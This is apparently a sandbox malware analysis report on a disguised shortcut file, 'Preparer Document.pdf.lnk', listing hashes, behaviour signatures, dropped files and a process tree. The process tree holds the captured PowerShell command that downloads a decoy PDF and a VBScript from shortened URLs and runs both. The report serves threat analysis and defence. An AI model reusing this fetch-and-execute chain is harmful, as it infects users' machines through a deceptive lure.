Overview

overview

8

Static

static

1

Preparer D...df.lnk

windows7-x64

3

Preparer D...df.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    143s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2023, 12:39

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Preparer Document.pdf.lnk

  • Size

    2KB

  • MD5

    2e0b9cab2b7b9fbcbef49a4de7eae1bd

  • SHA1

    d3fa3d182e175df299b29f61d1ef4210e0bcd0c9

  • SHA256

    6b13d081b52b550df6987464bac2d94d900c205663da5b8a38fcd0d841cb407e

  • SHA512

    74abc92d9788a751fbb762f900aaba928bcd377ed632e85ad2d3b8a1685c7057b31f5a044cf7d13ebb8acfd9f131a42320fa65ced0a3e46044ebdad6be168e2e

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Preparer Document.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2808
    • \??\UNC\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "\\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" n; Invoke-WebRequest https://shorturl.at/acjB9 -O C:\Users\Public\informs.pdf; C:\Users\Public\informs.pdf; Invoke-WebRequest https://shorturl.at/hjGMU -O C:\Windows\Tasks\Reylon.vbs; C:\Windows\Tasks\Reylon.vbs
      2⤵
      • Blocklisted process makes network request
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3624
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\informs.pdf"
        3⤵
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4628
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DAF137C4A9B026F1540569DD8A896673 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
              PID:4948
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2DB467EE8DB30E5548D8C09143C72370 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2DB467EE8DB30E5548D8C09143C72370 --renderer-client-id=2 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job /prefetch:1
              5⤵
                PID:3760
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=8E248C4CF77BD7553C091084D72748C2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8E248C4CF77BD7553C091084D72748C2 --renderer-client-id=4 --mojo-platform-channel-handle=2176 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:1400
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EB050A2305E9A3B00B76CD51E8A26DAE --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                    PID:5072
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1B4DAB1B373C5C9505A9C24B6799DCCF --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:2404
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F31E545F3CD058413EE610061F55CD8 --mojo-platform-channel-handle=2576 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:4236
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Reylon.vbs"
                    3⤵
                    • Blocklisted process makes network request
                    PID:2856
              • C:\Windows\System32\CompPkgSrv.exe
                C:\Windows\System32\CompPkgSrv.exe -Embedding
                1⤵
                  PID:404

                Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                        Filesize

                        64KB

                        MD5

                        b3c35eae5c47b0283af45cb8f2bf5237

                        SHA1

                        04caafa5253188496a0c6f3e344a5c31ca3276b6

                        SHA256

                        bc6c420c879f02d7b73b3de8bd3d016358388e4b1b53a384146806223dd7e003

                        SHA512

                        515456c5638aa0cb06b597ee0e7f3cbd6b7187fdc417b898a643a40ebf8ee524ac509d37a3fdb629eda1b9ee5244285b73ff939c630245de121132708af62246

                        Download Submit

                      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                        Filesize

                        64KB

                        MD5

                        1da9f8e76ab2731be2bb1d028af7f5fa

                        SHA1

                        be4a75aca783d05eab5abeb783046ec60990fefc

                        SHA256

                        de880a2955f9c9ea65cd714df3dad757e71005ba3a7a36ddaacf4573aa67ba0b

                        SHA512

                        8c173d4afd98c6e92544bf03ddc5ad4ee7786b2186ad23225b852d2259deea5acbf08838a0eb0b70faf56c56fa82d8116dba2f07667d99cf4459646ef4f2302d

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iruljt1o.23i.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Public\informs.pdf
                        Filesize

                        531KB

                        MD5

                        4ac08d5dadc6bf47a55f84e11de4c467

                        SHA1

                        484b573fa6389f5025e814df1e7b80fc2d193fb1

                        SHA256

                        aa09567f5732febf78c3246f9f6f2368aded364a4649231a9cf43ba0ab91c273

                        SHA512

                        38491ec9cc70d4bfcac7efae0b2c0e181fade3d6e161a58447d6ebec7cea82fcf54fc5bcb8d3c75dba3e712ce60d3ee3c26dcbdf1a3bf2c571464ace8e711fc6

                        Download Submit

                      • C:\Windows\Tasks\Reylon.vbs
                        Filesize

                        16KB

                        MD5

                        5fcc423dd95776e7ce18ea1804b27118

                        SHA1

                        85bbd202a7a2919cb4733c564dfd7c3ae2319510

                        SHA256

                        82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56

                        SHA512

                        63c9f5e642da7de4d6aab845e3f9940bf23b13fd75be8cd55b4639a688a840b01ec2b7e7c42eba22347ab5061d1a5a0ba55bb528ac779d9e7820e324af83483f

                        Download Submit

                      • memory/3624-155-0x0000000070610000-0x000000007065C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/3624-166-0x00000000075F0000-0x0000000007C6A000-memory.dmp

                        Filesize

                        6.5MB

                        Download

                      • memory/3624-146-0x00000000056B0000-0x0000000005716000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/3624-151-0x0000000005BF0000-0x0000000005C0E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/3624-152-0x0000000004860000-0x0000000004870000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3624-153-0x0000000006260000-0x0000000006292000-memory.dmp

                        Filesize

                        200KB

                        Download

                      • memory/3624-154-0x000000007F060000-0x000000007F070000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3624-135-0x0000000004820000-0x0000000004856000-memory.dmp

                        Filesize

                        216KB

                        Download

                      • memory/3624-165-0x0000000006240000-0x000000000625E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/3624-145-0x0000000004860000-0x0000000004870000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3624-167-0x0000000006FB0000-0x0000000006FCA000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/3624-168-0x0000000007020000-0x000000000702A000-memory.dmp

                        Filesize

                        40KB

                        Download

                      • memory/3624-169-0x0000000007230000-0x00000000072C6000-memory.dmp

                        Filesize

                        600KB

                        Download

                      • memory/3624-170-0x00000000071E0000-0x00000000071EE000-memory.dmp

                        Filesize

                        56KB

                        Download

                      • memory/3624-171-0x00000000072F0000-0x000000000730A000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/3624-172-0x00000000072D0000-0x00000000072D8000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/3624-139-0x0000000004860000-0x0000000004870000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3624-138-0x00000000055D0000-0x0000000005636000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/3624-137-0x0000000004CF0000-0x0000000004D12000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/3624-136-0x0000000004EA0000-0x00000000054C8000-memory.dmp

                        Filesize

                        6.2MB

                        Download